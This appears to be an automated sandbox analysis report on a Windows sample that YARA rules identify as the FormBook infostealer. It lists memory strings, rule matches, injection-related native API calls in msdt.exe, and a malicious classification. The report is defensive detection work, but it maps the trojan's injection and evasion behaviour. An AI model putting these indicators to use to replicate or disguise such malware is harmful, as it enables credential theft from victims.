          Source: msdt.exe, 0000000A.00000002.483640962.0000000005362000.00000004.00000001.sdmpString found in binary or memory: https://oss.maxcdn.com/libs/html5shiv/3.7.0/html5shiv.js
          Source: msdt.exe, 0000000A.00000002.483640962.0000000005362000.00000004.00000001.sdmpString found in binary or memory: https://oss.maxcdn.com/libs/respond.js/1.3.0/respond.min.js
          Source: msdt.exe, 0000000A.00000002.483640962.0000000005362000.00000004.00000001.sdmpString found in binary or memory: https://plus.google.com/
          Source: DNPr7t0GMY.exe, 00000002.00000002.220290008.0000000003320000.00000004.00000001.sdmpString found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css
          Source: msdt.exe, 0000000A.00000002.483640962.0000000005362000.00000004.00000001.sdmpString found in binary or memory: https://www.casar.com
          Source: msdt.exe, 0000000A.00000002.483640962.0000000005362000.00000004.00000001.sdmpString found in binary or memory: https://www.casar.com/assunto/casamentos/casamentos-reais/
          Source: msdt.exe, 0000000A.00000002.483640962.0000000005362000.00000004.00000001.sdmpString found in binary or memory: https://www.casar.com/assunto/casamentos/decoracao-de-casamento/
          Source: msdt.exe, 0000000A.00000002.483640962.0000000005362000.00000004.00000001.sdmpString found in binary or memory: https://www.casar.com/assunto/cha-de-panela/
          Source: msdt.exe, 0000000A.00000002.483640962.0000000005362000.00000004.00000001.sdmpString found in binary or memory: https://www.casar.com/assunto/lua-de-mel-2/
          Source: msdt.exe, 0000000A.00000002.483640962.0000000005362000.00000004.00000001.sdmpString found in binary or memory: https://www.casar.com/assunto/noivas/dicas-para-noivas/
          Source: msdt.exe, 0000000A.00000002.483640962.0000000005362000.00000004.00000001.sdmpString found in binary or memory: https://www.casar.com/assunto/noivas/vestidos-de-noiva/
          Source: msdt.exe, 0000000A.00000002.483640962.0000000005362000.00000004.00000001.sdmpString found in binary or memory: https://www.casar.com/assunto/organizacao/
          Source: msdt.exe, 0000000A.00000002.483640962.0000000005362000.00000004.00000001.sdmpString found in binary or memory: https://www.googletagmanager.com/gtm.js?id=
          Source: msdt.exe, 0000000A.00000002.483640962.0000000005362000.00000004.00000001.sdmpString found in binary or memory: https://www.googletagmanager.com/ns.html?id=GTM-N7Z9MZC
          Source: msdt.exe, 0000000A.00000002.483640962.0000000005362000.00000004.00000001.sdmpString found in binary or memory: https://www.youtube.com/casarpontocom

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 0000000A.00000002.478198621.0000000000C50000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.216484865.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.220966733.00000000042E9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.271117141.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.478065429.0000000000C20000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.271551704.0000000000CF0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.477312798.0000000000780000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.271485121.0000000000CC0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 4.0.DNPr7t0GMY.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.DNPr7t0GMY.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.0.DNPr7t0GMY.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.DNPr7t0GMY.exe.400000.0.raw.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 0000000A.00000002.478198621.0000000000C50000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000002.478198621.0000000000C50000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000000.216484865.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000000.216484865.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.220966733.00000000042E9000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.220966733.00000000042E9000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.271117141.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.271117141.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000002.478065429.0000000000C20000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000002.478065429.0000000000C20000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.271551704.0000000000CF0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.271551704.0000000000CF0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000002.477312798.0000000000780000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000002.477312798.0000000000780000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.271485121.0000000000CC0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.271485121.0000000000CC0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 4.0.DNPr7t0GMY.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.0.DNPr7t0GMY.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 4.2.DNPr7t0GMY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.2.DNPr7t0GMY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 4.0.DNPr7t0GMY.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.0.DNPr7t0GMY.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 4.2.DNPr7t0GMY.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.2.DNPr7t0GMY.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          .NET source code contains very large stringsShow sources
          Source: DNPr7t0GMY.exe, ISectionEntry.csLong String: Length: 326320
          Source: 2.0.DNPr7t0GMY.exe.f10000.0.unpack, ISectionEntry.csLong String: Length: 326320
          Source: 2.2.DNPr7t0GMY.exe.f10000.0.unpack, ISectionEntry.csLong String: Length: 326320
          Source: 4.0.DNPr7t0GMY.exe.4f0000.2.unpack, ISectionEntry.csLong String: Length: 326320
          Source: 4.0.DNPr7t0GMY.exe.4f0000.0.unpack, ISectionEntry.csLong String: Length: 326320
          Source: 4.2.DNPr7t0GMY.exe.4f0000.1.unpack, ISectionEntry.csLong String: Length: 326320
          Source: C:\Users\user\Desktop\DNPr7t0GMY.exeCode function: 4_2_004181B0 NtCreateFile,4_2_004181B0
          Source: C:\Users\user\Desktop\DNPr7t0GMY.exeCode function: 4_2_00418260 NtReadFile,4_2_00418260
          Source: C:\Users\user\Desktop\DNPr7t0GMY.exeCode function: 4_2_004182E0 NtClose,4_2_004182E0
          Source: C:\Users\user\Desktop\DNPr7t0GMY.exeCode function: 4_2_00418390 NtAllocateVirtualMemory,4_2_00418390
          Source: C:\Users\user\Desktop\DNPr7t0GMY.exeCode function: 4_2_004182AC NtReadFile,4_2_004182AC
          Source: C:\Users\user\Desktop\DNPr7t0GMY.exeCode function: 4_2_0041838B NtAllocateVirtualMemory,4_2_0041838B
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D195D0 NtClose,LdrInitializeThunk,10_2_04D195D0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D19540 NtReadFile,LdrInitializeThunk,10_2_04D19540
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D196D0 NtCreateKey,LdrInitializeThunk,10_2_04D196D0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D196E0 NtFreeVirtualMemory,LdrInitializeThunk,10_2_04D196E0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D19650 NtQueryValueKey,LdrInitializeThunk,10_2_04D19650
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D19660 NtAllocateVirtualMemory,LdrInitializeThunk,10_2_04D19660
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D19FE0 NtCreateMutant,LdrInitializeThunk,10_2_04D19FE0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D19780 NtMapViewOfSection,LdrInitializeThunk,10_2_04D19780
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D19710 NtQueryInformationToken,LdrInitializeThunk,10_2_04D19710
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D19840 NtDelayExecution,LdrInitializeThunk,10_2_04D19840
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D19860 NtQuerySystemInformation,LdrInitializeThunk,10_2_04D19860
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D199A0 NtCreateSection,LdrInitializeThunk,10_2_04D199A0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D19910 NtAdjustPrivilegesToken,LdrInitializeThunk,10_2_04D19910
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D19A50 NtCreateFile,LdrInitializeThunk,10_2_04D19A50
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D195F0 NtQueryInformationFile,10_2_04D195F0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D19560 NtWriteFile,10_2_04D19560
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D1AD30 NtSetContextThread,10_2_04D1AD30
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D19520 NtWaitForSingleObject,10_2_04D19520
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D19670 NtQueryInformationProcess,10_2_04D19670
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D19610 NtEnumerateValueKey,10_2_04D19610
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D197A0 NtUnmapViewOfSection,10_2_04D197A0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D1A770 NtOpenThread,10_2_04D1A770
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D19770 NtSetInformationFile,10_2_04D19770
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D19760 NtOpenProcess,10_2_04D19760
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D1A710 NtOpenProcessToken,10_2_04D1A710
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D19730 NtQueryVirtualMemory,10_2_04D19730
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D198F0 NtReadVirtualMemory,10_2_04D198F0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D198A0 NtWriteVirtualMemory,10_2_04D198A0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D1B040 NtSuspendThread,10_2_04D1B040
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D19820 NtEnumerateKey,10_2_04D19820
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D199D0 NtCreateProcessEx,10_2_04D199D0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D19950 NtQueueApcThread,10_2_04D19950
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D19A80 NtOpenDirectoryObject,10_2_04D19A80
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D19A10 NtQuerySection,10_2_04D19A10
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D19A00 NtProtectVirtualMemory,10_2_04D19A00
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D19A20 NtResumeThread,10_2_04D19A20
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D1A3B0 NtGetContextThread,10_2_04D1A3B0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D19B00 NtSetValueKey,10_2_04D19B00
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_007981B0 NtCreateFile,10_2_007981B0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_00798260 NtReadFile,10_2_00798260
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_007982E0 NtClose,10_2_007982E0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_00798390 NtAllocateVirtualMemory,10_2_00798390
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_007982AC NtReadFile,10_2_007982AC
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_0079838B NtAllocateVirtualMemory,10_2_0079838B
          Source: C:\Users\user\Desktop\DNPr7t0GMY.exeCode function: 2_2_0313C2B02_2_0313C2B0
          Source: C:\Users\user\Desktop\DNPr7t0GMY.exeCode function: 2_2_031399A02_2_031399A0
          Source: C:\Users\user\Desktop\DNPr7t0GMY.exeCode function: 4_2_004010304_2_00401030
          Source: C:\Users\user\Desktop\DNPr7t0GMY.exeCode function: 4_2_0041B8B14_2_0041B8B1
          Source: C:\Users\user\Desktop\DNPr7t0GMY.exeCode function: 4_2_0041B9634_2_0041B963
          Source: C:\Users\user\Desktop\DNPr7t0GMY.exeCode function: 4_2_00408C4B4_2_00408C4B
          Source: C:\Users\user\Desktop\DNPr7t0GMY.exeCode function: 4_2_00408C504_2_00408C50
          Source: C:\Users\user\Desktop\DNPr7t0GMY.exeCode function: 4_2_0041B4934_2_0041B493
          Source: C:\Users\user\Desktop\DNPr7t0GMY.exeCode function: 4_2_0041B4964_2_0041B496
          Source: C:\Users\user\Desktop\DNPr7t0GMY.exeCode function: 4_2_0041C5394_2_0041C539
          Source: C:\Users\user\Desktop\DNPr7t0GMY.exeCode function: 4_2_00402D894_2_00402D89
          Source: C:\Users\user\Desktop\DNPr7t0GMY.exeCode function: 4_2_00402D904_2_00402D90
          Source: C:\Users\user\Desktop\DNPr7t0GMY.exeCode function: 4_2_0041CE854_2_0041CE85
          Source: C:\Users\user\Desktop\DNPr7t0GMY.exeCode function: 4_2_0041BF124_2_0041BF12
          Source: C:\Users\user\Desktop\DNPr7t0GMY.exeCode function: 4_2_0041C7954_2_0041C795
          Source: C:\Users\user\Desktop\DNPr7t0GMY.exeCode function: 4_2_00402FB04_2_00402FB0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D9D46610_2_04D9D466
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04CE841F10_2_04CE841F
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04DA25DD10_2_04DA25DD
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04CED5E010_2_04CED5E0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D0258110_2_04D02581
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04DA1D5510_2_04DA1D55
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04DA2D0710_2_04DA2D07
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04CD0D2010_2_04CD0D20
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04DA2EF710_2_04DA2EF7
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D9D61610_2_04D9D616
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04CF6E3010_2_04CF6E30
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04DA1FF110_2_04DA1FF1
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04DA28EC10_2_04DA28EC
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04CEB09010_2_04CEB090
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D020A010_2_04D020A0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04DA20A810_2_04DA20A8
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D9100210_2_04D91002
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04CDF90010_2_04CDF900
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04CF412010_2_04CF4120
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04DA22AE10_2_04DA22AE
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D9DBD210_2_04D9DBD2
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D0EBB010_2_04D0EBB0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04DA2B2810_2_04DA2B28
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_0079B8B110_2_0079B8B1
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_0079B95410_2_0079B954
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_00788C5010_2_00788C50
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_00788C4B10_2_00788C4B
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_0079B49310_2_0079B493
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_0079B49610_2_0079B496
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_0079C53910_2_0079C539
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_00782D9010_2_00782D90
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_00782D8910_2_00782D89
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_0079CE8510_2_0079CE85
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_0079BF1210_2_0079BF12
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_00782FB010_2_00782FB0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_0079C79510_2_0079C795
          Source: C:\Windows\SysWOW64\msdt.exeCode function: String function: 04CDB150 appears 35 times
          Source: DNPr7t0GMY.exe, 00000002.00000002.220966733.00000000042E9000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameKygo.dll* vs DNPr7t0GMY.exe
          Source: DNPr7t0GMY.exe, 00000002.00000002.220966733.00000000042E9000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameDSASignature.dll@ vs DNPr7t0GMY.exe
          Source: DNPr7t0GMY.exe, 00000002.00000000.207658511.0000000001056000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameAppDomainTimerSafeHandle.exeB vs DNPr7t0GMY.exe
          Source: DNPr7t0GMY.exe, 00000004.00000002.271750109.000000000113F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs DNPr7t0GMY.exe
          Source: DNPr7t0GMY.exe, 00000004.00000002.271279344.0000000000636000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameAppDomainTimerSafeHandle.exeB vs DNPr7t0GMY.exe
          Source: DNPr7t0GMY.exe, 00000004.00000002.272130410.0000000002D50000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamemsdt.exej% vs DNPr7t0GMY.exe
          Source: DNPr7t0GMY.exeBinary or memory string: OriginalFilenameAppDomainTimerSafeHandle.exeB vs DNPr7t0GMY.exe
          Source: DNPr7t0GMY.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 0000000A.00000002.478198621.0000000000C50000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000002.478198621.0000000000C50000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000000.216484865.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000000.216484865.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.220966733.00000000042E9000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.220966733.00000000042E9000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.271117141.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.271117141.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000002.478065429.0000000000C20000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000002.478065429.0000000000C20000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.271551704.0000000000CF0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.271551704.0000000000CF0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000002.477312798.0000000000780000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000002.477312798.0000000000780000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.271485121.0000000000CC0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.271485121.0000000000CC0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.0.DNPr7t0GMY.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.0.DNPr7t0GMY.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.2.DNPr7t0GMY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.2.DNPr7t0GMY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.0.DNPr7t0GMY.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.0.DNPr7t0GMY.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.2.DNPr7t0GMY.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.2.DNPr7t0GMY.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/1@13/10
          Source: C:\Users\user\Desktop\DNPr7t0GMY.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\DNPr7t0GMY.exe.logJump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6244:120:WilError_01
